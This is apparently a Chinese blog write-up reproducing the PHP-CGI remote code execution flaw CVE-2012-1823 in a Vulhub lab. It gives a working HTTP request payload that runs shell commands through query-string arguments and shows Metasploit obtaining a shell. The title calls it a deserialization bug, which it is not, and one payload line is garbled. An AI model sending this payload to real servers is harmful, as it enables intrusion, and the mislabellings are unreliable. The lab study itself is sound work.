PHP反序列化漏洞之CGI远程代码执行漏洞

最新推荐文章于 2024-02-27 07:34:38 发布
最新推荐文章于 2024-02-27 07:34:38 发布
阅读量359 收藏 1
点赞数
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lcw991207/article/details/132338842
版权

PHP反序列化漏洞之CGI远程代码执行漏洞

一 :准备

提示:搭建靶场和docke环境,看另一篇vulhub靶场搭建

传送门:在Centos7中搭建Vulhub靶场

二:漏洞复现

1.开启靶场

注:CGI远程代码执行漏洞的编号为CVE-2012-1823

我们打开漏洞所处文件夹,开始运行靶场

docker-compose up -d

docker p

在这里插入图片描述

在浏览器中输入ip:8080访问靶场
在这里插入图片描述

2.漏洞利用

* -c 指定php.ini文件的位置
* -n 不要加载php.ini文件
* -d 指定配置项
* -b 启动fastcgi进程
* -s 显示文件源码
* -T 执行指定次该文件
* -h和-? 显示帮助

最简单的利用方式,当然就是-s,可以直接显示源码:
在这里插入图片描述

3.BP抓包构造pyload

在这里插入图片描述

修改请求方式为POST
在这里插入图片描述

构造pyload

POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: example.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

<?php echo shell_exec("id"); ?>

在最后一行写入了

<php? echo shell_exce("ls"):?>

补充:php执行系统命令的4个方法

system()
exec 执行一个外部程序
shell_exec 通过 shell 环境执行命令,并且将完整的输出以字符串的方式返回
passthru  执行外部程序并且显示原始输出

在这里插入图片描述
演示
在这里插入图片描述

4.永恒之蓝渗透

打开kali,输入

msfconsole

在这里插入图片描述
找到phpcgi漏洞的框架

search php cgi

在这里插入图片描述
第八个,直接使用,并查看参数

在这里插入图片描述

设置host和port后开始攻击
在这里插入图片描述
拿到了shell,因为是一个靶场,命令不全面
在这里插入图片描述

总结

提示:这里对文章进行总结:
CVE-2012-1823就是php-cgi这个sapi出现的漏洞,本漏洞只出现在以cgi模式运行的php中。

是liku不是里库
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
PHP-CGI远程代码执行漏洞分析与防范
10-19
本文给大家介绍的是PHP-CGI远程代码执行漏洞(CVE-2012-1823)分析和防范,这是最近爆出的一个php的比较严重的漏洞,这里分享给大家。
php cgi 执行,php cgi远程任意代码执行漏洞
weixin_39520353的博客
03-10 96
国外又发布了一个牛逼闪闪的php cgi远程任意代码执行漏洞:http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/粗看一下貌似没啥危害,因为php做了防范,在cgi这个sapi下是无法使用-r,-f等直接执行命令的参数的。只有少数几个参数可以使用,因此公告里也就给出了使用-s参数读取源文件的poc。另外关于RCE的PoC原文没有给...
CGI程序与ShellShock漏洞
最新发布
a1_pha的博客
02-27 1705
具体来说,当 Web 服务器使用 CGI 来处理用户的请求时,服务器会将请求中的各种信息(如请求头、参数等)转换为环境变量,并将这些变量传递给 CGI 脚本。由于 Shellshock 漏洞,攻击者可以构造特定的HTTP请求,向服务器发送恶意的环境变量,利用 Bash 的漏洞执行任意代码,从而获取服务器的控制权或者执行其他恶意操作。虽然该漏洞最初是在 Bash shell 中发现的,但其在 Web 服务器中的利用主要是通过 CGI 来实现的。中的一个安全漏洞,首次于2014年9月24日公开。
PHP-CGI远程代码执行漏洞(CVE-2012-1823)
weixin_74149904的博客
10-21 693
CVE-2012-1823就是存在于以cgi模式运行的php中, 本质是用户请求的参数被作为了php-cgi的参数。PHP-CGI远程代码执行漏洞(CVE-2012-1823)分析。
深入浅析PHP的session反序列化漏洞问题
10-19
主要介绍了PHP的session反序列化漏洞问题,需要的朋友可以参考下
Java反序列化漏洞利用工具.zip
04-10
java反序列化漏洞利用工具包含jboss|weblogic,网上其实有很多,但是用别人的工具收30分是不是有点不厚道,所以我用自己的分下载下来,然后以最低分贡献给大家,上次没有审核通过,希望这次可以
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen,里面的 jar 直接运行即可,用于 shiro 漏洞检测、修复验证等
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
php cgi漏洞利用工具 源代码
01-22
cgi mod(cve-2012-1823)最新漏洞,可以批量扫描多网段漏洞,多加利用,可以获取服务器控制权限。
(CVE-2012-1823)PHP-CGI远程代码执行漏洞
weixin_45253622的博客
05-20 1189
漏洞原理 php-cgi是一个类似于消息的“传递者”,它接收web容器收到的http数据包,并把里面的数据交给PHP解释器执行php-cgi有两个功能,一是提供cgi方式的交互,二是提供fastcgi方式的交互。 cgi方式:web容器接收到http数据包后,拿到用户请求的文件(cgi脚本),并fork除一个子进程(解释器)去执行这个文件,然后拿到执行结果,直接返回给用户,然后子进程结束,但是这个cgi模式不能接收同时接收大量的请求,因为创建进程的时候会消耗服务器资源,资源也不是无限的,所以有了
PHP-CGI远程代码执行漏洞CVE-2012-1823复现
从不专注的人的博客
06-17 737
目录CVE-2012-1823漏洞原因影响版本漏洞利用cgi模式下的参数开启实验环境访问网站制造漏洞执行代码移除漏洞环境 CVE-2012-1823 漏洞原因 用户请求的querystring被作为了php-cgi的参数执行了,命令行参数不仅可以通过#!/usr/local/bin/php-cgi -d include_path=/path的方式传入php-cgi,还可以通过querystring的方式传入。 影响版本 < php-5.3.12 or php < 5.4.2 mod方式、fpm方
php cgi 执行,PHP-CGI远程任意代码执行漏洞
weixin_42525672的博客
03-10 528
PHP-CGI远程任意代码执行漏洞发布日期:2012-05-03更新日期:2012-05-04受影响系统:PHP PHP描述:--------------------------------------------------------------------------------CVE ID: CVE-2012-1823PHP是一种HTML内嵌式的语言PHP与微软的ASP颇有几分相似,都是...
php-cgi漏洞,PHP-CGI远程代码执行漏洞(CVE-2012-1823)
weixin_36023909的博客
03-24 668
PHP-CGI远程代码执行漏洞(CVE-2012-1823)漏洞分析PHP SAPI 与运行模式在PHP源码中,有一个目录叫sapi。sapi在PHP中的作用,类似一个消息的“传递者”,(PHP-FPM中的fpm,其作用就是接受web容器通过fastcgi协议封装好的数据,交给PHP解释器执行;除了fpm,最常见的sapi应该是用于Apache的mod_php,这个sapi用于php和apache...
PHP-CGI远程代码执行漏洞
weixin_69925635的博客
07-18 369
使用kali-msf6对ubuntu的php-CGI漏洞攻击
php反序列化漏洞,相关介绍代码
05-26
好的,我明白了。关于PHP反序列化漏洞,它是一种安全漏洞,攻击者可以利用该漏洞在服务器端执行恶意代码。在PHP中,存在一些特殊的函数和语法可以用于将对象序列化为字符串,并从字符串反序列化为对象。但是,如果攻击者能够修改序列化的数据,就可以通过反序列化执行任意代码。以下是一个例子: ``` class Example { public $name; function __construct() { $this->name = 'example'; } function __destruct() { echo "Hello " . $this->name . "!"; } } $serialized_example = 'O:7:"Example":1:{s:4:"name";s:7:"hacker";}'; $example = unserialize($serialized_example); ``` 在这个例子中,我们定义了一个名为Example的类,其中包含一个构造函数和一个析构函数。构造函数设置一个$name变量,析构函数打印出“Hello”和$name变量的值。我们使用serialize()函数将Example对象序列化为字符串,并将名称变量更改为“hacker”,然后使用unserialize()函数将字符串反序列化为对象。由于没有对反序列化的输入进行验证,攻击者可以通过构造恶意序列化数据来执行任意代码。 为了防止PHP反序列化漏洞开发人员应该对反序列化数据进行严格的验证和过滤。此外,应注意使用安全的序列化库,例如JSON序列化,而不是其它的序列化方法。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

是liku不是里库

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值